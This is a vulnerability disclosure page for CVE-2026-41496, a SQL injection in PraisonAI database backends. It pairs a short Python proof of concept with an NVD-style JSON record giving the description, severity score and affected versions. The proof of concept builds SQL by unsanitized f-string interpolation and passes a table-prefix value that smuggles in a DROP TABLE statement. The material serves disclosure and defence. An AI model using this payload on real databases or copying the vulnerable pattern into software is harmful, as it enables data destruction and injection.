CVE-2026-41496

# PoC for CVE-2026-41496: SQL Injection in PraisonAI backends # This PoC demonstrates how a malicious table_prefix leads to SQL injection class VulnerableBackend: def __init__(self, table_prefix): # Vulnerable code pattern: direct f-string interpolation self.table_prefix = table_prefix def create_table(self): # Simulating the vulnerable SQL construction found in mysql.py, postgres.py, etc. # The table_prefix is not sanitized. query = f"CREATE TABLE IF NOT EXISTS {self.table_prefix}_data (id INT, value TEXT);" print(f"[DEBUG] Executing SQL: {query}") # In a real scenario, this query would be executed against the database return query # Exploit Scenario # Attacker crafts a payload to break out of the table name context # Payload: test_data; DROP TABLE test_data; -- malicious_input = "test_data); DROP TABLE test_data; --" backend = VulnerableBackend(table_prefix=malicious_input) # This generates: CREATE TABLE IF NOT EXISTS test_data); DROP TABLE test_data; --_data (id INT, value TEXT); # Depending on the DB backend, this could result in data deletion or injection of other SQL commands. backend.create_table()

{"cve": {"id": "CVE-2026-41496", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:33.693", "lastModified": "2026-05-09T00:16:27.707", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.9 and praisonaiagents version 1.6.9, the fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends — MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB — pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL. This issue has been patched in praisonai version 4.6.9 and praisonaiagents version 1.6.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.9", "matchCriteriaId": "926F2340-8373-45E8-8F68-EDB9E771A52E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:python:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "CE98749C-A5F2-4D34-9CBA-87CA20237D1E"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}